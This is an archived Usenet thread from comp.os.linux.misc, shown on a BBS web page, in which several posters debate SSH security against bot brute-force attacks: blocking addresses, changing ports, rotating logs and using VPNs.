Rocksolid Light

Welcome to RetroBBS

mail  files  register  newsreader  groups  login

Message-ID:  

"The identical is equal to itself, since it is different." -- Franco Spisani


computers / comp.os.linux.misc / Re: Is It Time To Replace SSH ???

SubjectAuthor
* Is It Time To Replace SSH ???26C.Z969
+* Re: Is It Time To Replace SSH ???Richard Kettlewell
|+* Re: Is It Time To Replace SSH ???The Natural Philosopher
||+* Re: Is It Time To Replace SSH ???Andreas Kohlbach
|||`* Re: Is It Time To Replace SSH ???The Natural Philosopher
||| `* Re: Is It Time To Replace SSH ???Roger Blake
|||  `- Re: Is It Time To Replace SSH ???The Natural Philosopher
||`* Re: Is It Time To Replace SSH ???Richard Kettlewell
|| +- Re: Is It Time To Replace SSH ???The Natural Philosopher
|| `* Re: Is It Time To Replace SSH ???Pancho
||  +* Re: Is It Time To Replace SSH ???The Natural Philosopher
||  |`- Re: Is It Time To Replace SSH ???Richard Kettlewell
||  `* Re: Is It Time To Replace SSH ???Richard Kettlewell
||   `- Re: Is It Time To Replace SSH ???Richard Kettlewell
|`* Re: Is It Time To Replace SSH ???26C.Z969
| +- Re: Is It Time To Replace SSH ???Carlos E. R.
| +- Re: Is It Time To Replace SSH ???The Natural Philosopher
| `- Re: Is It Time To Replace SSH ???Richard Kettlewell
+* Re: Is It Time To Replace SSH ???Lew Pitcher
|`* Re: Is It Time To Replace SSH ???26C.Z969
| +* Re: Is It Time To Replace SSH ???The Natural Philosopher
| |`- Re: Is It Time To Replace SSH ???26C.Z969
| `* Re: Is It Time To Replace SSH ???Popping Mad
|  `- Re: Is It Time To Replace SSH ???26C.Z969
+* Re: Is It Time To Replace SSH ???Marco Moock
|`* Re: Is It Time To Replace SSH ???Andreas Kohlbach
| +* Re: Is It Time To Replace SSH ???26C.Z969
| |+* Re: Is It Time To Replace SSH ???Andreas Kohlbach
| ||`* Re: Is It Time To Replace SSH ???26C.Z969
| || `* Re: Is It Time To Replace SSH ???Rich
| ||  `* Re: Is It Time To Replace SSH ???26C.Z969
| ||   `* Re: Is It Time To Replace SSH ???Computer Nerd Kev
| ||    `* Re: Is It Time To Replace SSH ???26C.Z969
| ||     `* Re: Is It Time To Replace SSH ???Andreas Kohlbach
| ||      `* Re: Is It Time To Replace SSH ???26C.Z969
| ||       +* Re: Is It Time To Replace SSH ???Robert Riches
| ||       |+* Re: Is It Time To Replace SSH ???The Natural Philosopher
| ||       ||`- Re: Is It Time To Replace SSH ???26C.Z969
| ||       |`- Re: Is It Time To Replace SSH ???26C.Z969
| ||       `* Re: Is It Time To Replace SSH ???The Natural Philosopher
| ||        `* Re: Is It Time To Replace SSH ???Charlie Gibbs
| ||         +* Re: Is It Time To Replace SSH ???The Natural Philosopher
| ||         |`- Re: Is It Time To Replace SSH ???26C.Z969
| ||         `* Re: Is It Time To Replace SSH ???26C.Z969
| ||          `* Re: Is It Time To Replace SSH ???Charlie Gibbs
| ||           `- Re: Is It Time To Replace SSH ???26C.Z969
| |`- Re: Is It Time To Replace SSH ???The Natural Philosopher
| `* Re: Is It Time To Replace SSH ???The Natural Philosopher
|  `* Re: Is It Time To Replace SSH ???Carlos E. R.
|   +* Re: Is It Time To Replace SSH ???The Natural Philosopher
|   |`* Re: Is It Time To Replace SSH ???Richard Kettlewell
|   | `* Re: Is It Time To Replace SSH ???Marc Haber
|   |  +- Re: Is It Time To Replace SSH ???The Natural Philosopher
|   |  +* Re: Is It Time To Replace SSH ???26C.Z969
|   |  |+* Re: Is It Time To Replace SSH ???Robert Heller
|   |  ||`* Re: Is It Time To Replace SSH ???26C.Z969
|   |  || +- Re: Is It Time To Replace SSH ???Computer Nerd Kev
|   |  || `- Re: Is It Time To Replace SSH ???Richard Kettlewell
|   |  |`* Re: Is It Time To Replace SSH ???Rich
|   |  | `* Re: Is It Time To Replace SSH ???Carlos E. R.
|   |  |  +* Re: Is It Time To Replace SSH ???Richard Kettlewell
|   |  |  |`* Re: Is It Time To Replace SSH ???The Natural Philosopher
|   |  |  | `* Re: Is It Time To Replace SSH ???26C.Z969
|   |  |  |  +* Re: Is It Time To Replace SSH ???Richard Kettlewell
|   |  |  |  |+* Re: Is It Time To Replace SSH ???Carlos E. R.
|   |  |  |  ||`- Re: Is It Time To Replace SSH ???Richard Kettlewell
|   |  |  |  |+- Re: Is It Time To Replace SSH ???The Natural Philosopher
|   |  |  |  |`* Re: Is It Time To Replace SSH ???26C.Z969
|   |  |  |  | `* Re: Is It Time To Replace SSH ???Richard Kettlewell
|   |  |  |  |  `* Re: Is It Time To Replace SSH ???26C.Z969
|   |  |  |  |   `- Re: Is It Time To Replace SSH ???Richard Kettlewell
|   |  |  |  `- Re: Is It Time To Replace SSH ???The Natural Philosopher
|   |  |  `* Re: Is It Time To Replace SSH ???Marc Haber
|   |  |   `* Re: Is It Time To Replace SSH ???26C.Z969
|   |  |    +* Re: Is It Time To Replace SSH ???David W. Hodgins
|   |  |    |+* Re: Is It Time To Replace SSH ???The Natural Philosopher
|   |  |    ||`- Re: Is It Time To Replace SSH ???26C.Z969
|   |  |    |`- Re: Is It Time To Replace SSH ???26C.Z969
|   |  |    `* Re: Is It Time To Replace SSH ???Carlos E. R.
|   |  |     `- Re: Is It Time To Replace SSH ???26C.Z969
|   |  `* Re: Is It Time To Replace SSH ???Richard Kettlewell
|   |   `* Re: Is It Time To Replace SSH ???Ted Heise
|   |    `* Re: Is It Time To Replace SSH ???Richard Kettlewell
|   |     `- Re: Is It Time To Replace SSH ???Ted Heise
|   +- Re: Is It Time To Replace SSH ???Computer Nerd Kev
|   `* Re: Is It Time To Replace SSH ???Andreas Kohlbach
|    `* Re: Is It Time To Replace SSH ???David W. Hodgins
|     +* Re: Is It Time To Replace SSH ???Andreas Kohlbach
|     |+* Re: Is It Time To Replace SSH ???Carlos E. R.
|     ||`* Re: Is It Time To Replace SSH ???Andreas Kohlbach
|     || `* Re: Is It Time To Replace SSH ???Carlos E. R.
|     ||  `* Re: Is It Time To Replace SSH ???Andreas Kohlbach
|     ||   `* Re: Is It Time To Replace SSH ???Carlos E. R.
|     ||    `- Re: Is It Time To Replace SSH ???26C.Z969
|     |`* Re: Is It Time To Replace SSH ???David W. Hodgins
|     | +- Re: Is It Time To Replace SSH ???Andreas Kohlbach
|     | `* Re: Is It Time To Replace SSH ???26C.Z969
|     |  +* Re: Is It Time To Replace SSH ???Andreas Kohlbach
|     |  |`* Re: Is It Time To Replace SSH ???26C.Z969
|     |  | `* Re: Is It Time To Replace SSH ???The Natural Philosopher
|     |  |  `- Re: Is It Time To Replace SSH ???26C.Z969
|     |  +* Re: Is It Time To Replace SSH ???Computer Nerd Kev
|     |  `* Re: Is It Time To Replace SSH ???The Natural Philosopher
|     `- Re: Is It Time To Replace SSH ???Carlos E. R.
`* Re: Is It Time To Replace SSH ???Popping Mad

Pages:123456
Re: Is It Time To Replace SSH ???

<tnjpjc$3jthm$9@dont-email.me>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10969&group=comp.os.linux.misc#10969

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: tnp@invalid.invalid (The Natural Philosopher)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 07:03:08 +0000
Organization: A little, after lunch
Lines: 18
Message-ID: <tnjpjc$3jthm$9@dont-email.me>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<wwvcz8ljc0x.fsf@LkoBDZeT.terraraq.uk> <tnernt$32eg3$9@dont-email.me>
<wwvmt7njjjv.fsf@LkoBDZeT.terraraq.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Sat, 17 Dec 2022 07:03:08 -0000 (UTC)
Injection-Info: reader01.eternal-september.org; posting-host="b5eb54ce705c3a36be291247b18b4826";
logging-data="3798582"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX18jhZFjcOJvuOXvmZkjJUT0UWywAgOaXdk="
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Thunderbird/102.4.2
Cancel-Lock: sha1:DWVPWmpQJoO3i8P1J00hmvZOGo8=
In-Reply-To: <wwvmt7njjjv.fsf@LkoBDZeT.terraraq.uk>
Content-Language: en-GB
 by: The Natural Philosop - Sat, 17 Dec 2022 07:03 UTC

On 16/12/2022 18:21, Richard Kettlewell wrote:
> The Natural Philosopher <tnp@invalid.invalid> writes:
>> On 15/12/2022 08:39, Richard Kettlewell wrote:
>>> Not much intelligence needed, anything that gets more than a handful
>>> of password authentication error is an attacker and gets added to my
>>> ‘block’ ipset.
>>>
>> Just hope it wasn't from some public wifi dynamic address that you
>> might want to use in future :-)
>
> Pretty unlikely. But my VPN will get me past it in the event that
> happens.
>
Well there you are. The classic 'wrapper' that allows you secure access
anywhere. With that you could probably use 'telnet'....
--
Climate Change: Socialism wearing a lab coat.

Re: Is It Time To Replace SSH ???

<op.1xa671jca3w0dxdave@hodgins.homeip.net>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10970&group=comp.os.linux.misc#10970

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: dwhodgins@nomail.afraid.org (David W. Hodgins)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 02:03:27 -0500
Organization: A noiseless patient Spider
Lines: 28
Message-ID: <op.1xa671jca3w0dxdave@hodgins.homeip.net>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed; delsp=yes
Content-Transfer-Encoding: 8bit
Injection-Info: reader01.eternal-september.org; posting-host="a277d08b3086472d382676c845e440cd";
logging-data="3801872"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/M20mNo+n0j2P7RzIOvxUy+wPC8tYf4DU="
User-Agent: Opera Mail/12.16 (Linux)
Cancel-Lock: sha1:MInouLyMurz093XMQQmLHJt17EU=
 by: David W. Hodgins - Sat, 17 Dec 2022 07:03 UTC

On Fri, 16 Dec 2022 21:24:46 -0500, Andreas Kohlbach <ank@spamfence.net> wrote:

> On Fri, 16 Dec 2022 10:30:17 +0100, Carlos E. R. wrote:
>>
>> On 16/12/2022 10.20, The Natural Philosopher wrote:
>>
>>> I've had open SSH for years on backbone hosted kit. everybody tries
>>> to login as root.
>>> I let them. Root is not allowed to log in.
>>
>> One idea would be to automatically block the IPs that try to login as
>> root or other typical names used by bots.
>
> Nah, don't. Have them have their fun. They don't know root won't get in
> and waste their own resources. Although today it won't matter either. But
> not letting them know they cannot login as root they keep trying instead
> of wandering off and try other servers where they might be successful.
>
>> That's something a human operator would do.
>
> I don't think so. Unless being DDoSed. But then you have to take a
> completely different approach to mitigate the traffic.

I don't block, but I use a non-standard port. Otherwise failed attempts
can fill the filesystem where the logs are stored. I had that happen before
I switched ports.

Regards, Dave Hodgins

Re: Is It Time To Replace SSH ???

<tnjpol$3jthm$10@dont-email.me>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10971&group=comp.os.linux.misc#10971

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: tnp@invalid.invalid (The Natural Philosopher)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 07:05:56 +0000
Organization: A little, after lunch
Lines: 34
Message-ID: <tnjpol$3jthm$10@dont-email.me>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk>
<tnilb0$1qdhe$1@news1.tnib.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Sat, 17 Dec 2022 07:05:57 -0000 (UTC)
Injection-Info: reader01.eternal-september.org; posting-host="b5eb54ce705c3a36be291247b18b4826";
logging-data="3798582"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/v66h/S6dyN2HI3et2CZ9QXMhC+n5eb78="
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Thunderbird/102.4.2
Cancel-Lock: sha1:DTHzeEinxe3nr14vxux1rhqmgpc=
Content-Language: en-GB
In-Reply-To: <tnilb0$1qdhe$1@news1.tnib.de>
 by: The Natural Philosop - Sat, 17 Dec 2022 07:05 UTC

On 16/12/2022 20:44, Marc Haber wrote:
> Richard Kettlewell <invalid@invalid.invalid> wrote:
>> The Natural Philosopher <tnp@invalid.invalid> writes:
>>> On 16/12/2022 09:30, Carlos E. R. wrote:
>>>> One idea would be to automatically block the IPs that try to login
>>>> as root or other typical names used by bots.
>>>> That's something a human operator would do.
>>>>
>>> Why bother? they would then go on to bother someone else, possibly
>>> with less bandwidth than I.
>>>
>>> If they want to spend an hour trying every single password in their
>>> dictionary, its no skin off my nose.
>>
>> I’ve got better uses for my CPU[1] than key agreement with low-rent
>> attackers, and better uses for my logs than background error noise.
>
> It's matter of style, both ways to do it have their advantages and
> their disadvantages. It's nothing to get missionary over.
>
Its not my CPU. I only rent it, and its bandwidth is taken up with other
stuff so that this is lost on the noise/

I don't rig my car up with complicated shields to stop the mud splashing
the wings (fenders) either.

On the server, the log files get rotated, on my car, it gets pressure
washed.

--
"First, find out who are the people you can not criticise. They are your
oppressors."
- George Orwell

Re: Is It Time To Replace SSH ???

<6KycnZ4e4cec9gD-nZ2dnZfqnPudnZ2d@earthlink.com>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10973&group=comp.os.linux.misc#10973

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!usenet.blueworldhosting.com!feed1.usenet.blueworldhosting.com!peer03.iad!feed-me.highwinds-media.com!news.highwinds-media.com!border-1.nntp.ord.giganews.com!nntp.giganews.com!Xl.tags.giganews.com!local-2.nntp.ord.giganews.com!nntp.earthlink.com!news.earthlink.com.POSTED!not-for-mail
NNTP-Posting-Date: Sat, 17 Dec 2022 07:08:48 +0000
Subject: Re: Is It Time To Replace SSH ???
Newsgroups: comp.os.linux.misc
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<-_-dnbdq0bqGnwH-nZ2dnZfqnPednZ2d@earthlink.com>
<87sfhfx3gz.fsf@usenet.ankman.de>
From: 26C.Z969@noaada.net (26C.Z969)
Date: Sat, 17 Dec 2022 02:08:12 -0500
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Thunderbird/78.13.0
MIME-Version: 1.0
In-Reply-To: <87sfhfx3gz.fsf@usenet.ankman.de>
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Language: en-US
Content-Transfer-Encoding: 7bit
Message-ID: <6KycnZ4e4cec9gD-nZ2dnZfqnPudnZ2d@earthlink.com>
Lines: 80
X-Usenet-Provider: http://www.giganews.com
NNTP-Posting-Host: 68.222.41.46
X-Trace: sv3-YyzEAQxTO6EzbHiWLCqxmM96h2fmjPYEF69xF3qhmagm+Csx1yJWALCMCNwT6KdaPHtJnUkf9yClNxh!I8D4B1+hV+5EajGiveVRSqF40uqql4vBQswEYMcRJ/heXBDo3jmtq9tBj/Za6UNm2LdFXVW9aMXh!sCFMC5DY3epX8+fvqgU=
X-Abuse-and-DMCA-Info: Please be sure to forward a copy of ALL headers
X-Abuse-and-DMCA-Info: Otherwise we will be unable to process your complaint properly
X-Postfilter: 1.3.40
X-Received-Bytes: 4863
 by: 26C.Z969 - Sat, 17 Dec 2022 07:08 UTC

On 12/16/22 1:33 AM, Andreas Kohlbach wrote:
> On Fri, 16 Dec 2022 00:28:57 -0500, 26C.Z969 wrote:
>>
>> On 12/15/22 6:36 PM, Andreas Kohlbach wrote:
>>> On Thu, 15 Dec 2022 18:03:48 +0100, Marco Moock wrote:
>>
>>>> Attacks on SSH on IPv4 networks exist (mostly brute-force), but just
>>>> let it run on an IPv6 address, almost nobody will find it and try to
>>>> log in.
>>> Also depends on how long an IP is advertising SSH (or other
>>> services). I
>>> have mine since two years now, and scammers getting busier to get into my
>>> SSH. Not that I care or block any of the IPs involved, as they change
>>> frequently anyway.
>>
>> Strictly IP-centric defenses won't cut it anymore.
>> Attackers tend to use distributed attacks - hundreds,
>> thousands, of addresses. IP-centric defenses can
>> slow-down at least some attackers, which can be good,
>> but hardly all.
>
> I know I'll only access mine via WIFI. Although it listens to the world
> on port 22 I actually don't allow any connection other than from
> 192.168.0.0/24 .
>

Helps.

But I might need to access from a number of random
IP addresses. VPNs can help, but not totally solve
maybe even if you pay for the VPN equiv of a static IP.

Not so long ago, I was working on the weekend and
watched one of these attacks take shape. First it
was one IP address showing up in the firewall logs.
Did a simple conservative /24 block on it. Half an
hour later MORE probes showed up - first from a
few addresses, then dozens, then hundreds banging
at it as fast as they could. Even looking at the
detailed connection info revealed no common factors
you could filter. Dunno if this was one bot or the
"hot" address was shared around. So, as I was pretty
much the only one using it (and it was NOT p22 -
never use that !) I just changed the external port
number. However for TEN MONTHS there were literally
a thousand+ probes a day on that old, dead, port.

This is where I concluded that SSH was not fit for
the modern world. It's not "smart" enough.

>> IPV6 does have some potential ... but a lot of big
>> providers, even Comcast, only offer IPV4 to most
>> customers.
>>
>> Sometimes the "best" defense is obfuscation ...
>> run SSH on an obscure port. If you look at yer
>> firewall logs you'll see shitloads of probes
>> to the standard port. Attackers are mostly bots
>> these days and go for the low-hanging fruit.
>
> May be just let everybody in without password or host key auth. Well no
> seriously.

Some DO make it THAT easy - because, well, it's EASY.
And if you do use a password ... well ... "password"
or "12345678" ought to be good, right ?

> But just for the fun I once set my FTP server for anonymous login (any
> email address and any password allowed to gain access) and looked ever so
> often if someone uploads some crap (I didn't offer any downloads). Still
> nothing after hours, so I looked into the logs. Many people trying many
> different IDs and passwords, which were refused. But none tried anonymous
> access which would had let them in. *g*
>
> I ran this test for eight hours, but no one tried anonymous access.

24 hours, 24 days, 24 months ... not LONG enough. Thing is
the little probe bots WILL eventually find you - and then
POUNCE like a thousand rabid weasels.

Re: Is It Time To Replace SSH ???

<6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10974&group=comp.os.linux.misc#10974

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!usenet.blueworldhosting.com!feed1.usenet.blueworldhosting.com!peer03.iad!feed-me.highwinds-media.com!news.highwinds-media.com!feeder.usenetexpress.com!tr1.iad1.usenetexpress.com!69.80.99.14.MISMATCH!border-1.nntp.ord.giganews.com!nntp.giganews.com!Xl.tags.giganews.com!local-2.nntp.ord.giganews.com!nntp.earthlink.com!news.earthlink.com.POSTED!not-for-mail
NNTP-Posting-Date: Sat, 17 Dec 2022 07:31:13 +0000
Subject: Re: Is It Time To Replace SSH ???
Newsgroups: comp.os.linux.misc
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com> <tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de> <tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net> <tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk> <tnilb0$1qdhe$1@news1.tnib.de>
From: 26C.Z969@noaada.net (26C.Z969)
Date: Sat, 17 Dec 2022 02:31:12 -0500
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Thunderbird/78.13.0
MIME-Version: 1.0
In-Reply-To: <tnilb0$1qdhe$1@news1.tnib.de>
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Language: en-US
Content-Transfer-Encoding: 8bit
Message-ID: <6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>
Lines: 67
X-Usenet-Provider: http://www.giganews.com
NNTP-Posting-Host: 68.222.41.46
X-Trace: sv3-Z7Dq8oRxnU2H3AlJ2oCIYWJ6Hvu1pchv6TbUa+8g4ESC1IHrvPnz32lNK6l1lBHcmQThNAGZxItTvEg!VnwxW4x/aOAxw09Rr8h7AD6Hbhgm6YZxJXYYNnLwq5v9kZ0lXimX1Q/4+Qu0L1kip4g2oL5k25O5!lVGrq6ERlPATOeHTYQ8=
X-Abuse-and-DMCA-Info: Please be sure to forward a copy of ALL headers
X-Abuse-and-DMCA-Info: Otherwise we will be unable to process your complaint properly
X-Postfilter: 1.3.40
X-Received-Bytes: 4476
 by: 26C.Z969 - Sat, 17 Dec 2022 07:31 UTC

On 12/16/22 3:44 PM, Marc Haber wrote:
> Richard Kettlewell <invalid@invalid.invalid> wrote:
>> The Natural Philosopher <tnp@invalid.invalid> writes:
>>> On 16/12/2022 09:30, Carlos E. R. wrote:
>>>> One idea would be to automatically block the IPs that try to login
>>>> as root or other typical names used by bots.
>>>> That's something a human operator would do.
>>>>
>>> Why bother? they would then go on to bother someone else, possibly
>>> with less bandwidth than I.
>>>
>>> If they want to spend an hour trying every single password in their
>>> dictionary, its no skin off my nose.
>>
>> I’ve got better uses for my CPU[1] than key agreement with low-rent
>> attackers, and better uses for my logs than background error noise.
>
> It's matter of style, both ways to do it have their advantages and
> their disadvantages. It's nothing to get missionary over.

Strictly "human" attackers are pretty much a historical
artifact at this point - unless you're a bank or govt
letter agency or some similar high-profile/high-return
target. For the rest of the world it's all BOTS - busy
busy little bots. They WILL try every password in their
book and then start on the random shit. They will come
at you from a hundred, a thousand, ten thousand IP
ripped-off addresses. They will keep at it for days,
months. Just one of a thousand little bot processes
running on a few boxes in Romania or Russia that link
through "friendly"-looking address ranges (DigitalOcean
seems to be the most popular route, the Netherlands
seems to be THE path Russians use to APPEAR to be
"EU").

Been there, see it.

SSH isn't "smart" enough to see what a human can
plainly see - an attack. We need some "AI" sort
of adjunct at this point.

Yea, there ARE other tricks - narrow the IP range that
the firewall will even let GET at yer SSH port - but
that's not a solution for all.

A smarter SSH, one intentionally designed for this
bot-ridden world, is needed.

The OTHER, growing, part of the security equation
isn't "hacking" anymore - even by bots - but
"human factors". Idiots in the company or even
spies planted as interns, looking over shoulders.

The favorite ploy the past few months has been
fake invoices - seemingly from respectable corps,
maybe even ones you do biz with. The link to the
detailed invoice will be bad - so you'll wanna
click the "help" link. SOME are obvious ploys,
others are pretty damned good ... might have to
dissect the source/html to spot the fraud. Few
smaller outfits have people who can DO that and
big "computer service providers" are, well, they
collect money and then never DO much. Even they
don't have the people-power or interest to cope.
SOMEWHERE in the service agreement you signed
your rights away ..........

Re: Is It Time To Replace SSH ???

<871qoywh67.fsf@usenet.ankman.de>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10975&group=comp.os.linux.misc#10975

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: ank@spamfence.net (Andreas Kohlbach)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 03:47:12 -0500
Organization: A noiseless patient Spider
Lines: 30
Message-ID: <871qoywh67.fsf@usenet.ankman.de>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de>
<op.1xa671jca3w0dxdave@hodgins.homeip.net>
MIME-Version: 1.0
Content-Type: text/plain
Injection-Info: reader01.eternal-september.org; posting-host="417f9360dcbc0e0109603fae17cd0195";
logging-data="3815510"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX18mdw0yjTL1Iq85g0K+gs2D"
User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)
Cancel-Lock: sha1:w9NjbwJDY2SurTKwgs9OWP+QrmY=
sha1:A7oZA1gAZSXUv0cYHiaVEw90Uos=
X-No-Archive: Yes
 by: Andreas Kohlbach - Sat, 17 Dec 2022 08:47 UTC

On Sat, 17 Dec 2022 02:03:27 -0500, David W. Hodgins wrote:
>
> On Fri, 16 Dec 2022 21:24:46 -0500, Andreas Kohlbach <ank@spamfence.net> wrote:
>
>> On Fri, 16 Dec 2022 10:30:17 +0100, Carlos E. R. wrote:
>>>
>> Nah, don't. Have them have their fun. They don't know root won't get in
>> and waste their own resources. Although today it won't matter either. But
>> not letting them know they cannot login as root they keep trying instead
>> of wandering off and try other servers where they might be successful.
>>
>>> That's something a human operator would do.
>>
>> I don't think so. Unless being DDoSed. But then you have to take a
>> completely different approach to mitigate the traffic.
>
> I don't block, but I use a non-standard port. Otherwise failed attempts
> can fill the filesystem where the logs are stored. I had that happen before
> I switched ports.

There's logrotate to take care of logfile sizes.

~$ ls -lrt /var/log/auth*
-rw-r----- 1 root adm 78358 Nov 19 23:39 /var/log/auth.log.4.gz
-rw-r----- 1 root adm 83875 Nov 26 23:57 /var/log/auth.log.3.gz
-rw-r----- 1 root adm 44726 Dec 3 23:46 /var/log/auth.log.2.gz
-rw-r----- 1 root adm 449644 Dec 10 23:51 /var/log/auth.log.1
-rw-r----- 1 root adm 987377 Dec 17 03:45 /var/log/auth.log
--
Andreas

Re: Is It Time To Replace SSH ???

<wwvlen6be3x.fsf@LkoBDZeT.terraraq.uk>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10976&group=comp.os.linux.misc#10976

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!news.nntp4.net!nntp.terraraq.uk!.POSTED.tunnel.sfere.anjou.terraraq.org.uk!not-for-mail
From: invalid@invalid.invalid (Richard Kettlewell)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 08:58:58 +0000
Organization: terraraq NNTP server
Message-ID: <wwvlen6be3x.fsf@LkoBDZeT.terraraq.uk>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk>
<tnilb0$1qdhe$1@news1.tnib.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit
Injection-Info: mantic.terraraq.uk; posting-host="tunnel.sfere.anjou.terraraq.org.uk:172.17.207.6";
logging-data="1671"; mail-complaints-to="usenet@mantic.terraraq.uk"
User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)
Cancel-Lock: sha1:pFAPvbeTbpkqjRkIBZ4wnt17XOQ=
X-Face: h[Hh-7npe<<b4/eW[]sat,I3O`t8A`(ej.H!F4\8|;ih)`7{@:A~/j1}gTt4e7-n*F?.Rl^
F<\{jehn7.KrO{!7=:(@J~]<.[{>v9!1<qZY,{EJxg6?Er4Y7Ng2\Ft>Z&W?r\c.!4DXH5PWpga"ha
+r0NzP?vnz:e/knOY)PI-
X-Boydie: NO
 by: Richard Kettlewell - Sat, 17 Dec 2022 08:58 UTC

Marc Haber <mh+usenetspam1118@zugschl.us> writes:
> Richard Kettlewell <invalid@invalid.invalid> wrote:
>>I’ve got better uses for my CPU[1] than key agreement with low-rent
>>attackers, and better uses for my logs than background error noise.
>
> It's matter of style, both ways to do it have their advantages and
> their disadvantages. It's nothing to get missionary over.

I don’t disagree. Although, when I started, the probes were literally
audible, in my environment: syslog defaults to writing logs
synchronously and my server’s hard disk was rather on the loud side. A
persistent prober produce a gentle ‘bonk ... bonk ... bonk’ noise. That
had to go l-)

--
http://www.greenend.org.uk/rjk/

Re: Is It Time To Replace SSH ???

<k05o85F35vsU1@mid.individual.net>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10978&group=comp.os.linux.misc#10978

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!news.swapon.de!fu-berlin.de!uni-berlin.de!individual.net!not-for-mail
From: robin_listas@es.invalid (Carlos E. R.)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 12:41:57 +0100
Lines: 41
Message-ID: <k05o85F35vsU1@mid.individual.net>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
